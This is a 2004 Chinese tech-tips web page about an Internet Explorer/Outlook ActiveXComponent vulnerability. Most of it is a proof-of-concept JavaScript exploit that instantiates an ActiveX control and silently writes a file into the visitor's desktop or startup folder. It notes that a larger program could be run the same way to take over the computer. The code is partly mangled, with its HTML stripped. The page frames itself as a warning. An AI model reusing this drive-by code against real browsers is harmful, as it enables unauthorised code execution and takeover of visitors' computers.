首页 电脑 电脑学堂 查看内容

隐藏在网页中的程序

2004-9-29 20:05 702 0

摘要: 隐藏在网页中的程序,微软的IE/Outlook4.X-5.X浏览器有一个com.ms.activeX.ActiveXComponent漏洞,可以使一个恶意程序在访问者浏览网页时加载并下载到访问者电脑,...
关键词: 程序 setTimeout 一个 com activeX ActiveXComponent 面上 CNers setProperty document

隐藏在网页中的程序,微软的IE/Outlook4.X-5.X浏览器有一个com.ms.activeX.ActiveXComponent漏洞,可以使一个恶意程序在访问者浏览网页时加载并下载到访问者电脑,并执行。本文给大家一个例子,要大家知道我们平时上网多么危险。本程序将在您的桌面上建立一个叫CNers.COM.HTM的文件:Demo #2 - IE 5.5/Outlook安全漏洞- com.ms.activeX.ActiveXComponent 允许执行任意程序 instantiated --> a1=document.applets[0];fn="CNers.COM.HTM";doc="s1=\'欢迎你访问视窗安全!\\请您将在启动文件夹内的CNers.COM.HTM删除即可\';alert(s1);document.body.innerHTML=s1";function f1(){a1.setProperty('DOC',doc);}function f(){// The ActiveX classidcl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";a1.setCLSID(cl);a1.createInstance();setTimeout("a1.setProperty('Path','"+fn+"')",1000);setTimeout("f1()",1500);setTimeout("a1.invoke('write',VA);alert('"+fn+" 被建立');",2000);}setTimeout("f()",1000) VA = ARRAY()' 获取com.ms.com.Variant[]这样,我们在您的桌面上建立了文件,并写入启动组。当然我们可以写一个64KB的程序,并让你在没有被警告的情况下执行,从而控制您的电脑。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部